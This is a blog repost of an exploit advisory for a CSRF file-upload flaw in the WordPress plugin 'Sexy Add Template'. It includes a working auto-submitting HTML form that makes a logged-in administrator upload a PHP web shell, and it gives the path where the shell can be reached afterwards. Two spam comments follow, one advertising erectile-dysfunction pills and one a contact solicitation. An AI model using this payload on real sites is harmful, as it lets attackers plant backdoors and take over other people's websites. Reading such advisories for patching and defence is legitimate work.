Friday 19 April 2013

Wordpress Plugin Sexy Add Template


 1=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0          _                   __           __       __                         1
 1        /' \            __  /'__`\        /\ \__  /'__`\                       0
 0       /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___               1
 1       \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\              0
 0          \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/               1
 1           \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\               0
 0            \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/               1
 1                       \ \____/ >> Exploit database separated by exploit       0
 0                        \/___/          type (local, remote, DoS, etc.)        1
 1                                                                               0
 0       [x] Official Website: http://www.1337day.com                            1
 1       [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                      0
 0                                                                               1
 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
 0                  I'm NuxbieCyber Member From Inj3ct0r TEAM                    1
 1                  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$                   0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |||   Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability    |||
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability
 ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/
 ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ]
 ./Security Risk : [ Critical Level ]
 ./Category XPL  : [ WebApps/ZeroDay ]
 ./Tested On     : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID
 ./Time & Date   : September, 22 2012. 10:27 AM. Jakarta, Indonesia.
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 |||                        -=[ Use It At Your Risk ]=-                        |||
 |||               This Was Written For Educational Purpos Only                |||
 |||               Author Will Be Not Responsible For Any Damage               |||
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 #################################################################################
 #
 # [ Information Details ]
 # - Wordpress Plugin Sexy Add Template:
 # Attacker allow CSRF Upload Shell.
 # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
 #
 # <html>
 # <head>
 # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
 # </head>
 # <body onload="document.form0.submit();">
 # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
 # <input type="hidden" name="newfile" value="yes" />
 # <input type="hidden" type="text" value="shell.php" name="AM_filename">
 # <textarea type="hidden" name="AM_file_content">
 # [ Your Script Backdoor/Shell ]
 # </textarea>
 # </form>
 # </body>
 # </html>
 #
 # - Access Shell:
 # http://localhost/wp-content/themes/[theme-name]/shell.php

2 comments:

  1. Fellas, following time you purchase the pill, talk to your companions if they require a person.
    This should double up the sale from the anti-impotence medication Cialis.
    A modern getting signifies that the erectile dysfunction capsule which has pepped up the sexual life of adult
    males is proving being helpful in the event of gals struggling from a sexual disinterest.
    The analysis underlines the medicine functions for females just as much as it does
    in the event of adult males if not far more.

    Also visit my web site: Erection Treatment Pills Summer 2013 - www.erectionpillssummer.com

    ReplyDelete
  2. Do contact me if u r in chennai : ramyadivya24@gmail.com

    ReplyDelete